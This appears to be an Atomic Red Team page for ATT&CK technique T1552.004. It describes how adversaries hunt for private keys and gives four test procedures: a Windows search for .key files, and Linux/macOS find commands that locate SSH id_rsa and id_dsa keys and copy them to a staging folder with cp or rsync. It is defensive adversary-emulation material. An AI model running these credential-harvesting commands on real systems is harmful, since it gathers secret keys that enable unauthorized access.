T1552.004
Unsecured Credentials: Private Keys
Description from ATT&CK
Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.
Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows. These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
Some private keys require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/
Atomic Tests
Atomic Test #1 - Private Keys
Find private keys on the Windows file system. File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc
Supported Platforms: windows
auto_generated_guid: 520ce462-7ca7-441e-b5a5-f8347f632696
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
dir c:\ /b /s .key | findstr /e .key
Atomic Test #2 - Discover Private SSH Keys
Discover private SSH keys on a macOS or Linux system.
Supported Platforms: macos,linux
auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| search_path | Path where to start searching from. | path | / |
| output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt |
Attack Commands: Run with sh!
1
2
3
find #{search_path} -name id_rsa >> #{output_file}
find #{search_path} -name id_dsa >> #{output_file}
Cleanup Commands:
1
2
rm #{output_file}
Atomic Test #3 - Copy Private SSH Keys with CP
Copy private SSH keys on a Linux system to a staging folder using the 1
cp
Supported Platforms: linux
auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| search_path | Path where to start searching from. | path | / |
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging |
Attack Commands: Run with sh!
1
2
3
4
mkdir #{output_folder}
find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
find #{search_path} -name id_dsa -exec cp --parents {} #{output_folder} \;
Cleanup Commands:
1
2
rm #{output_folder}
Atomic Test #4 - Copy Private SSH Keys with rsync
Copy private SSH keys on a Linux or macOS system to a staging folder using the 1
rsync
Supported Platforms: macos,linux
auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| search_path | Path where to start searching from. | path | / |
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging |
Attack Commands: Run with sh!
1
2
3
4
mkdir #{output_folder}
find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
find #{search_path} -name id_dsa -exec rsync -R {} #{output_folder} \;
Cleanup Commands:
1
2
rm -rf #{output_folder}